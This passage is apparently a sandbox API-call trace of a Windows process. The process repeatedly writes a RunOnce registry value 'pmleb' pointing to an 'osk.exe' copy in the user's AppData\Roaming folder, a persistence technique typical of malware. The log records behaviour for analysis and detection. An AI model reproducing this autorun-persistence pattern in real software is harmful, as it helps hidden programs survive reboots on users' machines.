lpdwDisposition=0x0) returned 0x0 [0079.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.990] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.990] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.990] RegCloseKey (hKey=0x280) returned 0x0 [0079.990] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.990] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.990] SetTimer (hWnd=0x20280, nIDEvent=0x205e, uElapse=0xa, lpTimerFunc=0x0) returned 0x205e [0079.990] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.004] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.004] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.004] KillTimer (hWnd=0x20280, uIDEvent=0x205e) returned 1 [0080.004] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.004] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.004] IUnknown:Release (This=0x787518) returned 0x1 [0080.005] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.005] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.005] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.005] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.005] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0080.005] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.005] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0080.005] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.006] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0080.006] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.006] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.006] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.006] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.006] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.006] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.007] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.007] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0080.007] RegCloseKey (hKey=0x280) returned 0x0 [0080.007] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.007] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.007] SetTimer (hWnd=0x20280, nIDEvent=0x205f, uElapse=0xa, lpTimerFunc=0x0) returned 0x205f [0080.007] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.020] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.020] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.020] KillTimer (hWnd=0x20280, uIDEvent=0x205f) returned 1 [0080.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.020] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.021] IUnknown:Release (This=0x787518) returned 0x1 [0080.021] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.021] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.021] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.021] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.021] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.021] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 
[0080.021] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.021] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0080.021] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.022] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0080.022] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.022] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.022] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.022] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.022] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.022] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.023] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.023] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.023] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.023] RegCloseKey (hKey=0x280) returned 0x0 [0080.023] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.023] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.023] SetTimer (hWnd=0x20280, nIDEvent=0x2060, uElapse=0xa, lpTimerFunc=0x0) returned 0x2060 [0080.023] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.033] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.034] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.034] KillTimer (hWnd=0x20280, uIDEvent=0x2060) returned 1 [0080.034] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.034] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.034] IUnknown:Release (This=0x787518) returned 0x1 [0080.034] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.035] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.035] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.035] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.035] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0080.035] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.035] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0080.035] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.036] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0080.036] ??2@YAPAXI@Z () returned 0x2b524a0 [0080.036] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.037] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.037] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.037] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.037] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.037] 
